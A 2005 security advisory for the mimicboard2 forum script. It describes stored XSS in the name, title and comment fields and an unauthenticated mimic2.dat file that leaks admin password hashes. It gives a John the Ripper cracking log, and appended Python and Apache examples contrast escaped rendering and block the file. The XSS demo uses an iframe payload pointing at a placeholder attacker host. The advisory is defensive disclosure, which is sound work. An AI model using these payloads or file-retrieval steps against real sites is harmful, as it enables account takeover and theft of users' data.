------------------------------------------------------------
- EXPL-A-2005-013 exploitlabs.com Advisory 042 -
------------------------------------------------------------
- mimicboard2 -

AFFECTED PRODUCTS
=================
mimicboard2 #086 and lower
http://www.chitta.com/nobu/download/#mimic2

OVERVIEW
========
Mimic2 is an HTML open-forum style of blog, tailored in particular to
the Japanese market (where it is very popular).

DETAILS
=======
1. XSS

Mimic2 does not properly filter script content submitted by users. XSS
may be inserted through the name, title and comment fields. The
malicious script is stored with the post, rendered when the page is
visited, and executed in the context of the visiting user's browser.

2. Information disclosure

http://[host]/mimic2.dat is readable from the webroot and has no
protection by default. mimic2 stores its data in this file, consisting
of:

a. administrator passwords
b. user information, including referer and IP address, message content
   and the password if one was used in the post.

POC
===
1. ------
Input a malicious iframe script into the comment, title and name fields
at:

http://[host]/mimic2.cgi

eg:

2. ------
Information disclosure

Request http://[host]/mimic2.dat directly: it is served without any
authentication and contains the administrator password hash(es) and the
user data described above.

The password(s) are easily crackable, as evidenced by running John the
Ripper against the hash taken from mimic2.dat (saved here as
mimic2.txt):

C:\misc\john-16\run>john -w:password.lst mimic2.txt
Loaded 1 password (Standard DES [24/32 4K])
password         (mimic board2)

SOLUTION:
=========
vendor contact: nobu@pt.imaginet.ne.jp
Aug 24, 2005: vendor contacted
Sept 8, 2005: no response

Credits
=======
This vulnerability was discovered and researched by Donnie Werner of
exploitlabs.

mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org
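The XSS in section 1 of DETAILS comes from interpolating the name, title and comment fields into the page without escaping. The following is an added example, not code from the advisory or from mimic2 itself: mimic2's real template is not reproduced, `render_post_vulnerable` is an assumed stand-in that emits the fields unescaped as the advisory describes, `render_post_safe` shows the escaping that removes the issue, and the iframe payload and `attacker.invalid` host are constructed sample input.

```python
"""Added example (not part of the exploitlabs advisory or of mimic2): a
stand-in for the unescaped rendering that gives stored XSS through the
name, title and comment fields, next to the escaped form."""
import html

# Constructed sample payload of the kind the POC describes: an iframe
# injected through a form field. The src host is a placeholder.
PAYLOAD = '<iframe src="http://attacker.invalid/" width="0" height="0"></iframe>'

# Assumed page fragment; mimic2's own template is not reproduced here.
TEMPLATE = (
    '<div class="post">\n'
    '  <span class="name">{name}</span>\n'
    '  <h3 class="title">{title}</h3>\n'
    '  <p class="comment">{comment}</p>\n'
    '</div>\n'
)


def render_post_vulnerable(name: str, title: str, comment: str) -> str:
    """Interpolates user input straight into the HTML, the behaviour the
    advisory describes: any markup the poster supplied is emitted as-is."""
    return TEMPLATE.format(name=name, title=title, comment=comment)


def render_post_safe(name: str, title: str, comment: str) -> str:
    """Escapes every field before interpolation: '<', '>', '&' and quotes
    become entities, so the browser shows them as text instead of markup."""
    def esc(s: str) -> str:
        return html.escape(s, quote=True)
    return TEMPLATE.format(name=esc(name), title=esc(title), comment=esc(comment))


def contains_markup(rendered: str, payload: str) -> bool:
    """True if the injected payload survives verbatim in the rendered page,
    i.e. the browser would parse it as an element."""
    return payload in rendered


if __name__ == "__main__":
    # Try the payload in each of the three fields the advisory names.
    for field in ("name", "title", "comment"):
        args = {"name": "alice", "title": "hello", "comment": "first post"}
        args[field] = PAYLOAD
        bad = render_post_vulnerable(**args)
        good = render_post_safe(**args)
        print(f"{field}: vulnerable={contains_markup(bad, PAYLOAD)} "
              f"safe={contains_markup(good, PAYLOAD)}")
```

`html.escape(..., quote=True)` is the right treatment for these three fields because they land in HTML element content. Input that ends up inside an attribute value, a URL or a script block needs the encoding for that context instead, and the check has to be applied at output time for every field, not just the ones the advisory lists.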
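For section 2 of DETAILS the vendor gave no response, so the fix is on the operator's side: move mimic2.dat out of the DocumentRoot, and where the script's install layout does not allow that, stop the web server from serving it. The fragment below is an added example, not vendor-supplied configuration; it assumes Apache httpd, which the advisory does not state, and Apache 2.2 syntax as current when the advisory was written.

```apache
# Added example, not from the mimic2 vendor: refuse HTTP requests for the
# data file. The CGI still reads it from the filesystem, which <Files>
# does not affect. On Apache 2.4 replace the Order/Deny lines with
# "Require all denied".
<Files "mimic2.dat">
    Order allow,deny
    Deny from all
</Files>
```

After applying it, a request for http://[host]/mimic2.dat should return 403 rather than the file. Blocking the URL does not undo what has already been disclosed: any administrator or post password that was reachable should be treated as compromised and changed, and since the hash format is traditional DES crypt (as John's "Standard DES" line shows), the replacement is limited to 8 significant characters and should not be reused anywhere else.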